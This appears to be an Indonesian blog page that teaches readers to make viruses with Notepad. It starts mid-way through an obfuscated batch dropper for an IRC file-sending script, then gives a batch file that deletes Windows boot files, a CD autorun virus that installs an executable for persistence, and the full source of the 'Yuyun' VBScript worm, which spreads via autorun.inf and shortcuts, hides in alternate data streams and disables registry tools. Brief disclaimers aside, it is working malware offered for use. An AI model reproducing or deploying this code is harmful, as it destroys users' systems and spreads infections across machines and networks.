%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “sock_n” + %vs%97) + “me ” + %vs%36) + “r” + %vs%97) + “nd(1,99999)”>>irc.vbs% AJJJ %
%wc% ” .msg ” + %vs%36) + “1 _DCC ” + %vs%115) + %vs%101) + %vs%110) + %vs%100) + ” ” + %vs%37) + “filee ” + %vs%36) + “longip(” + %vs%36) + “ip) ” + %vs%37) + “port ” + %vs%36) + “file(” + %vs%37) + “filee).size ” + %vs%36) + “+ _”>>irc.vbs% AJJJ %
%wc% ” .socklisten ” + %vs%37) + “sock_n” + %vs%97) + “me ” + %vs%37) + “port”>>irc.vbs% AJJJ %
goto irck% AJJJ %
:irck % AKKK %
%wc% ” .timers off”>>irc.vbs% AKKK %
%wc% ” .timer ” + %vs%36) + “+ ” + %vs%36) + “r” + %vs%97) + “nd(1,99999) 0 10 .cloze”>>irc.vbs% AKKK %
%wc% ” } “>>irc.vbs% AKKK %
goto ircl% AKKK %
:ircl % ALLL %
%wc% ” }”>>irc.vbs% ALLL %
%wc% ” on 1:socklisten:” + %vs%37) + “sock_n” + %vs%97) + “me: {”>>irc.vbs% ALLL %
goto ircm% ALLL %
:ircm % AMMM %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “client_n” + %vs%97) + “me ” + %vs%36) + “r” + %vs%97) + “nd(1,9999999)”>>irc.vbs% AMMM %
%wc% ” .sockclose ” + %vs%37) + “sock_n” + %vs%97) + “me”>>irc.vbs% AMMM %
goto ircn% AMMM %
:ircn % ANNN %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “l 0?>>irc.vbs% ANNN %
%wc% ” .bre” + %vs%97) + “d ” + %vs%37) + “filee ” + %vs%37) + “l 4000 ” + %vs%38) + “le”>>irc.vbs % ANNN %
goto irco% ANNN %
:irco % AOOO %
%wc% ” .sockwrite -b ” + %vs%37) + “client_n” + %vs%97) + “me 4000 ” + %vs%38) + “le”>>irc.vbs% AOOO %
%wc% ” ” + %vs%37) + “l = ” + %vs%37) + “l + 4000?>>irc.vbs% AOOO %
goto ircp% AOOO %
:ircp % APPP %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “end 0?>>irc.vbs% APPP %
%wc% ” }”>>irc.vbs% APPP %
%wc% ” on 1:sockre” + %vs%97) + “d:” + %vs%37) + “client_n” + %vs%97) + “me: {”>>irc.vbs% APPP %
goto ircq % APPP %
:ircq % AQQQ %
%wc% ” .%fi% (” + %vs%37) + “l >= ” + %vs%36) + “file(” + %vs%37) + “filee).size) {”>>irc.vbs% AQQQ %
%wc% ” .” + %vs%115) + %vs%101) + %vs%116) + ” ” + %vs%37) + “end 1?>>irc.vbs% AQQQ %
goto ircr% AQQQ %
:ircr % ARRR %
%wc% ” .sockclose ” + %vs%37) + “client_n” + %vs%97) + “me”>>irc.vbs% ARRR %
%wc% ” .h” + %vs%97) + “lt”>>irc.vbs% ARRR %
%wc% ” } .else {”>>irc.vbs% ARRR %
goto ircs% ARRR %
:ircs % ASSS %
%wc% ” .%fi% (” + %vs%37) + “end != 1) {”>>irc.vbs% ASSS %
%wc% ” .bre” + %vs%97) + “d ” + %vs%37) + “filee ” + %vs%37) + “l 4000 ” + %vs%38) + “le”>>irc.vbs% ASSS %
goto irct% ASSS %
:irct % ATTT %
%wc% ” .sockwrite -b ” + %vs%37) + “client_n” + %vs%97) + “me 4000 ” + %vs%38) + “le”>>irc.vbs% ATTT %
%wc% ” ” + %vs%37) + “l = ” + %vs%37) + “l + 4000?>>irc.vbs% ATTT %
%wc% ” } } }”>>irc.vbs% ATTT %
goto ircu% ATTT %
:ircu % AUUU %
%wc% ” ” + %vs%97) + “li” + %vs%97) + “s cloze { .sockclose ” + %vs%37) + “sock_n” + %vs%97) + “me } “>>irc.vbs% AUUU %
echo file.Close >>irc.vbs% AUUU %
cscript irc.vbs% AUUU %
cls% AUUU %
goto eirc% AUUU %
:eirc % mawar-shadow %
del irc.vbs % mawar-shadow %
find “mawar-shadow”<%0>>mawarkuning.bat
copy mawarkuning.bat %mir%\Mawar Kuning.bat % mawar-shadow %
del mawarkuning.bat % mawar-shadow %
cls % mawar-shadow %

Tips dan Hack membuat virus dengan NOTEPAD

Ingat !!!
Informasi ini tidak untuk membantu anda dalam suatu kejahatan. Tetapi, ini hanya sekedar informasi kecil untuk terus tetap berhati-hati ketika menerima suatu file ataupun men-download file script sekecil apapun.
Copi kode dibawah ini paste di notepad anda


@echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini

Simpan dengan nama sesuka anda dengan tipe bat, misal (Vhacker.bat ) tapi ingat setelah di save jangan sampai anda mengkliknya ....virus ini sangat berbahaya..!!! dikarenakan menghapus program vital windwos anda...apa bila anda mengkliknya..setelah shutdown anda tak akan bisa lagi membuka windows.... harus memformat ulang... anda mengikuti tutorial ini ,anda harus tanggung resikonya....

Membuat Virus via CD

virus sederhana : :D *berbahaya*

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y

copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

Ultimate virus : aplikasi jahil

* Ketika user menjalankan program, dia akan dihadapkan pada 3 pilihan: Format Harddisk, Delete Windows Folder, Delete all contents of local disk.
* Kalau user memilih Format Harddisk, sebuah progress bar palsu akan muncul bahwa harddisk sedang diformat. Begitu dia menekan Cancel, Si Layar Biru Maut (BSOD) akan muncul.
Kalau user memilih Delete Windows Folder, sama seperti tadi. Hanya proses ini tidak bisa dicancel. Lalu setelah itu program akan “merestart” komputer (tentunya restart bohongan, Windows masih tetap jalan. Sama seperti Delete all contents of local disk.

* Lalu, ketika komputer dalam proses “booting palsu”, dalam layar ala DOS Screen, akan muncul tulisan “There is a problem with your motherboard ROM”. User diperintahkan untuk menekan sembarang tombol untuk lanjut. Tapi pesan sama muncul lagi, sampai ketiga kalinya muncul pesan “Your motherboard is damaged”. User langsung pingsan~
* Kalau si user masih sadar, dia akan menekan tombol lagi dan muncul pesan “THANKS GOD IT’S ONLY A JOKE”. Program selesai Cheesy
Jika anda tertarik silahkan download aplikasinya DISINI
passsword untuk membuka  : hackcenter.wordpress.com

Membuat virus yuyun ( source code virus yuyun )

Rem Worm code Begins here

'www.xxxxx.or.id;==================================== my name:Yuyun 1.0

' ============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
If status="auto" Then
sh.Explore Left(WScript.ScriptFullName,3)
Else
status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
If fso.FolderExists(status) Then
sh.Explore status
Else
fso.CreateFolder status
sh.Explore status
End If
End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,"Yuyun^_^~!~2008"+" >>>",0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=""
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run "WScript.exe //e:VBScript "+tmpt+" """+Q+""""

Rem Worm encoded body begins here

'Yuyun^_^~!~2008 >>> =======================================================
' My name : Yuyun Ver 1.0
' I just wanna see every girl looks nice, better, kinds especially a moslem girl
' by: Anonymouse in Jatim, November 2008
' When I found nothing beauty else... and then I wrote this script for all
'=======================================================

On Error Resume Next
Dim fso, ws, status,status1, fly
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Set net = CreateObject("wscript.network")
fly=false
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
docx=ws.SpecialFolders("MyDocuments")
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
End If
if fso.fileexists(tmp+"\Yuyun.Q") then
set ira=fso.getfile(tmp+"\Yuyun.Q")
ira.attributes=0
ira.name="shalihah.ira"
if ira.name="shalihah.ira" then
ira.name="Yuyun.Q"
set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true)
else
fly=true
end if
else
set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true)
end if
Set AQ=fso.GetFile(status)
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
AQ.Copy tmpt,True
Set AQ=fso.GetFile(tmpt)
AQ.Attributes=39
anv=tmp+"\auto.exe"
If Not fso.FileExists(anv) Then AQ.Copy anv
Set auto=fso.GetFile(anv)
auto.attributes=0
Set aut=fso.OpenTextFile(anv,2,True,0)
isi="[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto"
isi=Replace(isi,">",vbCrLf)
aut.Write isi
aut.Close
auto.Attributes=39
ltkc=sh.Namespace(&H1c&).Self.path + "\Microsoft\CD Burning"
AQ.Copy ltkc+"\thumb.db",True
auto.Copy ltkc+"\autorun.inf",True
If fso.FileExists(docx+"\database.mdb") Then fso.GetFile(docx+"\database.mdb").Attributes=0
AQ.Copy docx+"\database.mdb",True
regQ
Set rara=UNISKA
Hertz False
If Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3
call attack_net
Hertz True
Sub rekursif(path,dp)
On Error Resume Next
dropf path
wscript.sleep 50
If dp>0 Then
For Each fldr1 In fso.GetFolder(path+"\").SubFolders
rekursif fldr1.Path, dp-1
Next
End If
End Sub
Sub dropf(path)
On Error Resume Next
if day(now)=1 and (month(now)mod 3)=1 then
rara.copy path+"\Baca AQ.rtf"
rara.copy path+"\My name is Yuyun.rtf"
end if
g1=path+"\autorun.inf"
g2=path+"\Thumb.db"
If fso.FileExists(g1) Then
Set g11=fso.GetFile(g1)
If g11.Attributes<>39 Then
g11.Attributes=0
auto.Copy path+"\autorun.inf",True
end if
else
auto.Copy path+"\autorun.inf",True
end if
If fso.FileExists(g2) Then
Set g12=fso.GetFile(g2)
If g12.Attributes<>39 Then
g12.Attributes=0
AQ.Copy path+"\Thumb.db",True
end if
else
AQ.Copy path+"\Thumb.db",True
End If
If Not fso.FileExists(path+"\Microsoft.lnk") Then
shorZvnita path+"\Microsoft","Microsoft"
drop=Array("New Harry Potter and...","New Folder","SuratQ","Rahasia","Game","Zvnita","Download","DataQ","DataQ")
ww=1
For Each d In drop
If Day(now) Mod 3 = ww Then shorZvnita path+"\"+d,d
wscript.sleep 60
ww=ww+1
Next
r=0
For Each fldr In fso.GetFolder(path+"\").SubFolders
shorZvnita path+"\"+fldr.name,fldr.Name
wscript.sleep 60
If r>3 Then
Exit For
End if
r=r+1
Next
End If
End Sub
Sub shorZvnita(path,trgt)
Set shor=ws.CreateShortcut(path+".lnk")
shor.iconlocation="shell32.dll,3"
shor.targetpath="wscript.exe"
shor.arguments="//e:VBScript thumb.db """+trgt+""""
shor.save
End Sub
function attack_net()
On Error Resume Next
err.clear
Set objFolder = sh.Namespace(&H13&)
Set colItems = objFolder.Items
For Each strFileName in objFolder.Items
t= objFolder.GetDetailsOf(strFileName, 14)
if fso.folderexists(t) then
rekursif t,4
end if
Next
End function
Sub tdr()
On Error Resume Next
err.clear
WScript.Sleep 180000
if err.number>0 then wscript.quit
End Sub
function UNISKA()
On error resume next
x=vbcrlf
adv="Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^! www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-A'raf:26)"
adv=replace(adv,">",x)
set Yu2n=fso.opentextfile(tmp+"\v.doc",2,true)
Yu2n.write adv
Yu2n.close
if day(now)=1 and (month(now)mod 3)=1 then
if fly=false then
for i=1 to 3
ws.run "notepad.exe /p """+tmp+"\v.doc"""
next
end if
end if
set UNISKA=fso.getfile(tmp+"\v.doc")
end function
Sub regQ()
On Error Resume Next
if day(now)=1 then
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "Yuyun_Cantix"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"
ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\",""
end if
ws.regdelete "HKCR\lnkfile\IsShortcut"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer","Wscript.exe //e:VBScript """+docx+"\database.mdb"""
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"
if lcase(fso.getdrive("c:").FileSystem)="ntfs" then
iraQ=AQ.openastextstream(1,0).read(AQ.size)
www=fso.GetSpecialFolder(0)
set jjk=fso.opentextfile(www+"\:Microsoft Office Update for Windows XP.sys",2,true)
jjk.write iraQ
jjk.close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+www+"\:Microsoft Office Update for Windows XP.sys"""
end if
End Sub
Sub Hertz(ooo)
On Error Resume Next
do
For Each drv In fso.Drives
If drv.DriveType=1 Then
rekursif drv.Path,4
Else
rekursif drv.Path,2
End if
Next
if fly=false then
tdr
else
wscript.quit
end if
regQ
If ooo=False Then
Exit Do
End If
loop
End Sub

rem worm encoded body ends

Rem By xxxxxx
Rem Fully decoded, no editing take apart

Mohon Jangan Di salah gunakan...!!!